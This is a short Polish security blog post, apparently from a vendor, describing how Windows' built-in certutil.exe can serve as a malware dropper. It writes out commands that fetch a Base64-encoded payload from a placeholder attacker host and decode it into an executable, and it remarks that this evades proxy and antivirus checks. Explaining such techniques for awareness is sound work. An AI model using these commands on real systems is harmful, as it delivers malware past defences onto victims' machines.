Dropper i Windows – schemat ataku
Jeden z podstawowych schematów ataku zakłada, że ofiara ściągnie i uruchomi dropper (oprogramowanie umożliwiające instalowanie dodatkowego oprogramowania bez ingerencji ze strony użytkownika). Ten z kolei pobierze właściwy złośliwy kod. Okazuje się, że w standardowych instalacjach Windows znajduje się już wbudowane narzędzie certutil.exe, które skutecznie i bez zbędnych śladów może zostać wykorzystane jako dropper. Przewidzianą funkcjonalnością certutil.exe jest wyświetlanie, zarzadzanie certyfikatami i kluczami. Ten pozornie prosty programik posiada jednak bardzo rozwiniętą funkcjonalność parametrów z linii komend. Między innymi przyjmuje jako parametry adresy URL.
Dropper z Windows w praktyce
Wyobraźmy sobie następujący atak:
C:\Temp>certutil.exe -urlcache -split -f “https://hackers.home/badcontent.txt” bad.txt
Powoduje ściągnięcie z internetu złośliwego plik zakodowanego do Base64 (co zazwyczaj pozwala ominąć zabezpieczenia proxy i antywirusa)
C:\Temp>certutil.exe -decode bad.txt bad.exe
Rozpakowujemy plik do formy wykonywanej.
W efekcie pozostaje tylko wykonać złośliwy kod na komputerze ofiary i przejąć nad nim pełną kontrole.
Źródło: Internet Storm Center
—
Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.